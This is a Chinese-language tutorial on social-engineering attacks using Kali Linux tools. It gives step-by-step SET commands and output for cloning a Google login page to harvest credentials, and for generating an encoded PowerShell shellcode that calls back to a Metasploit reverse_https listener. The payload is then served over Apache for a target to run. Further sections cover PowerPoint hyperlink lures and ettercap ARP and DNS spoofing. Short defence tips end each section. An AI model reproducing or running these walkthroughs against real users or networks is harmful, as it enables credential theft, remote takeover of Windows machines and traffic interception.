社会工程学

社会工程学

学习Setookit工具

Setookit工具介绍

  • Setookit工具是使用Python驱动框架(pythondriven),用于模拟社会工程学安全测试的工具,软件设计目的是通过培训实现安全。

  • 官网:https://www.social-engineer.org/

在Kali Linux下打开Setookit

  • Kali Linux 中默认集成了Setookit,可以通过终端中直接输入setoolkit打开。
┌──(root💀kali)-[~/桌面]
└─# setoolkit          

         .M"""bgd `7MM"""YMM MMP""MM""YMM
        ,MI    "Y   MM    `7 P'   MM   `7
        `MMb.       MM   d        MM
          `YMMNq.   MMmmMM        MM
        .     `MM   MM   Y  ,     MM
        Mb     dM   MM     ,M     MM
        P"Ybmmd"  .JMMmmmmMMM   .JMML.

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!


 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>
  • 菜单介绍

从菜单中选择:

​ 1)社会工程攻击
​ 2)渗透测试(快速跟踪)
​ 3)第三方模块
​ 4)更新Social-Engineer工具包
​ 5)更新工具配置文件
​ 6)帮助和关于

99)退出社会工程学工具包

Set工具收割用户凭证

  • 用户凭证指:系统登录时需要使用的用户名和密码。
  • Setookit工具通过克隆登录页面,然后诱使用户登录Setookit克隆后搭建与源网页一样的站点。
  • 如果用户输入用户凭证,那么Setookit中会将用户凭证记录在/.set/report目录下。

    实践收割用户凭证

  • 在Set工具中使用社会工程学测试,选择1后会弹出社会工程学安全测试的选项。

set> 1
                          .  ..
                       MMMMMNMNMMMM=
                   .DMM.           .MM.MM.                 MM,.
                 MN.                    MM.
               .M.                       MM
              .M   .....................  NM
              MM   .8888888888888888888.   M7
             .M    88888888888888888888.   ,M
             MM       ..888.MMMMM    .     .M.
             MM         888.MMMMMMMMMMM     M
             MM         888.MMMMMMMMMMM.    M
             MM         888.      NMMMM.   .M
              M.        888.MMMMMMMMMMM.   ZM
              NM.       888.MMMMMMMMMMM    M:
              .M+      .....              MM.
               .MM.                     .MD
                 MM .                  .MMMM                .MM.
                    ,MM?          .MMM
                       ,MMMMMMMMMMM
                

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!


 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 
  • 菜单介绍

从菜单中选择:
1)鱼叉式网络钓鱼攻击矢量。
2)网站攻击矢量。
3)感染媒体生成器。
4)创建负载和监听器。
5)群发邮件攻击。
6)基于Arduino的攻击向量。
7)无线接入点攻击载体。
8)二维码生成器攻击向量。
9)PowerShell攻击矢量。
10)第三方模块。
99)返回主菜单。

  • 选择2基于Web站点的安全测试向量。
set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

set:webattack>
  • 菜单介绍

​ 1)Java Applet攻击方式。
​ 2)Metasploit浏览器攻击方法。
​ 3)凭证收集器攻击方式。
​ 4)标签攻击方式。
​ 5)Web推送攻击方式。
​ 6)多攻击WEB方法。
​ 7)HTA攻击方式。
99)返回主菜单

  • 选择3用户认证凭证收割选项目。
set:webattack>3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu
  • 菜单介绍

​ 1)Web模板。
​ 2)站点克隆人。
​ 3)自定义导入。
99)返回WebAttack菜单

  • 选择1Web站点模板
set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report

-------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---

The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this 
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really 
important:

If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.

# 回车
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.10.129]:

--------------------------------------------------------
             **** Important Information ****

For templates, when a POST is initiated to harvest
credentials, you will need a site for it to redirect.

You can configure this option under:

      /etc/setoolkit/set.config

Edit this file, and change HARVESTER_REDIRECT and
HARVESTER_URL to the sites you want to redirect to
after it is posted. If you do not set these, then
it will not redirect properly. This only goes for
templates.

--------------------------------------------------------

  1. Java Required
  2. Google
  3. Twitter

  • 接下来是选择模板我们这里选择2
set:webattack> Select a template:2

[*] Cloning the website: http://www.google.com                                                                     
[*] This could take a little bit...                                                                                

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.                                                                                              
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80                                                                     
[*] Information will be displayed to you as it arrives below:                                                      
  • 最后浏览器打开localhost就可以看到图下效果

  • 测试在这里输入admin和admin,会得到下方效果
[*] Cloning the website: http://www.google.com                                                                     
[*] This could take a little bit...                                                                                

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.                                                                                              
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80                                                                     
[*] Information will be displayed to you as it arrives below:                                                      
192.168.10.129 - - [28/Feb/2021 06:07:50] "GET / HTTP/1.1" 200 -
192.168.10.129 - - [28/Feb/2021 06:07:51] "GET /favicon.ico HTTP/1.1" 404 -
192.168.10.129 - - [28/Feb/2021 06:07:51] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: GALX=SJLCkfgaqoM                                                                                            
PARAM: continue=https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX                                          
PARAM: service=lso                                                                                                 
PARAM: dsh=-7381887106725792428                                                                                    
PARAM: _utf8=â                                                                                                     
PARAM: bgresponse=js_disabled                                                                                      
PARAM: pstMsg=1                                                                                                    
PARAM: dnConn=                                                                                                     
PARAM: checkConnection=                                                                                            
PARAM: checkedDomains=youtube                                                                                      
POSSIBLE USERNAME FIELD FOUND: Email=admin                                                                         
POSSIBLE PASSWORD FIELD FOUND: Passwd=admin                                                                        
PARAM: signIn=Sign+in                                                                                              
PARAM: PersistentCookie=yes                                                                                        
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.                       

防御收割用户凭证

  • 进行用户凭证时,一定要进行域名认证。例如Google登录,认清是否在Google域名下输入。

  • 如果在局域网内部要注意是否存在DNS挟持,避免用户凭证信息泄露。

Set工具Powershell注入安全测试

Set工具Powershell注入原理

  • Powershell安全测试适用于所有微软Vista发布后的操作系统,通过注入Powershell shellcode到目标机器,以此获得反弹shell。

Set工具Powershell执行注入

  • 使用set工具使用社会工程学安全测试选项1
set> 1
Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.
  • 菜单介绍

从菜单中选择:
1)鱼叉式网络钓鱼攻击矢量。
2)网站攻击矢量。
3)感染媒体生成器。
4)创建负载和监听器。
5)群发邮件攻击。
6)基于Arduino的攻击向量。
7)无线接入点攻击载体。
8)二维码生成器攻击向量。
9)PowerShell攻击矢量。
10)第三方模块。
99)返回主菜单。

  • 选择Powershell安全测试选择9
set> 9

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful  landscape for deploying payloads and performing functions that  do not get triggered by preventative technologies.

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database

  99) Return to Main Menu

set:powershell>
  • 菜单介绍

​ 1)PowerShell字母数字外壳代码注入器。
​ 2)PowerShell反转壳。
​ 3)PowerShell绑定外壳。
​ 4)PowerShell转储SAM数据库。
99)返回主菜单

  • 选择Powershell具体类型 建议选择1,字符串编码的shell,不易被轻易识别
set:powershell>1
Enter the IPAddress or DNS name for the reverse host: 192.168.10.129
set:powershell> Enter the port for the reverse [443]:
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..

No encoder specified, outputting raw payload
Payload size: 395 bytes
Final size of c file: 1685 bytes
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : [!] valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'
set> Do you want to start the listener now [yes/no]: : yes


     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````                        ```````````````          `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///
                                `...............`              `...-/////...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMMNMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMMMMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMMMMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMMMMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMMMMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-``````       -mh` :MMMMMMMMMMMMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v6.0.30-dev                          ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: When in a module, use back to go 
back to the top level prompt

[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/root/.set/reports/powershell/powershell.rc)> set LPORT 443
LPORT => 443
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://0.0.0.0:443

Set工具Powershell code注入

  • Powershell code存储在/root/.set/reports/powershell/目录下,通过cat查看shellcode为了方便演示,以及将shellcode移动并重命名到/var/www/html/ps.txt
┌──(root💀kali)-[~/.set/reports/powershell]
└─# cp x86_powershell_injection.txt /var/www/html/ps.txt
  • 通过http服务,传递ps脚本并执行。
  • 启动apache systemctl start apache2,用户通过浏览器访问到ps.txt,然后在cmd中执行

  • 执行完毕之后,返回Kali Linux等待反弹shell。

  • 在反弹的shell中可以执行更多命令。

  • 等目标用户连接上以后使用sessions -i 序号

防御Powershell code 注入

  • 拒绝执行未知安全性的任意代码,安装杀毒软件。

Set工具PowerPoint安全测试与防御

PowerPoint安全测试介绍

  • PowerPoint是特别受欢迎的演示软件,但是其中很多功能都极大的方便用户操作。例如设置连接,方便自动调整。但是如果在未知PowerPoint中链接到恶意页面就可能因为点击链接中了恶意代码。

PowerPoint安全测试

  • 新建一个PowerPoint幻灯片,其中插入一页PPT,然后插入文本框拖到最大化覆盖整个页面,然后插入链接。

  • 发送给目标等待TA点击链接。

PowerPoint安全防御

  • 切勿打开来历不明的PPT,不访问未知链接。关闭PPT尽量使用ESC或空格。

DNS重定向安全测试与防御

DNS重定介绍

  • DNS(Domain Name System)域名系统,负责IP地址与域名进行相互转换。而DNS重定向将设置范围内的用户访问的正确域名转到重定向之后的IP地址中。

ettercap DNS重定向安全测试

  • 修改ettercap执行权限,配置/etc/ettercap/etter.conf

  • 配置/etc/ettercap/etter.dns,将用户访问的baidu.com重定向到192.168.10.129。

  • 使用ettercap工具执行命令ettercap -i eth0 -Tq -P dns-spoof -M arp:remote。在浏览器中访问容易网站。
# -i 指定重定向网卡
# -T 使用文本模式
# -q 安静的进行重定向
# -P 设置插件
# -M ARP欺骗
┌──(root💀kali)-[~/桌面]
└─# ettercap -i eth0 -Tq -P dns_spoof -M arp:remote                                                          127 ⨯

ettercap 0.8.3.1 copyright 2001-2020 Ettercap Development Team

Listening on:
  eth0 -> 00:0C:29:CF:A6:9A
          192.168.10.129/255.255.255.0
          fe80::20c:29ff:fecf:a69a/64

set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
set_redir_commands(): cannot remove the redirect, did you uncomment the redir_command_off command on your etter.conf file?
set_redir_commands(): cannot remove the redirect for IPv6, did you uncommend the redir6_command_off command in your etter.conf file?
Privileges dropped to EUID 0 EGID 0...

  34 plugins
  42 protocol dissectors
  57 ports monitored
28230 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

5 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : ANY (all the hosts in the list)

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DNS重定向防御

  • 屏蔽重定向的IP地址,通过浏览器审查工具查询。

网络钓鱼防御

网络钓鱼介绍

  • 网络钓鱼(Phishing,与钓鱼的英文fishing发音相近,又名钓鱼法)是通过大量发送声明称来自于银行或者其他知名机构的欺骗性垃圾邮箱,意图引诱收件人给出敏感信息(如用户名,口令,账号ID,ATM PIN码或信用卡详细信息)的一种安全测方法。

更好的防御网络钓鱼

  • 提高安全意识,绝不做未知的事情(运行未知程序,打开未知文档)。
  • 避免在网络中泄露个人真实信息。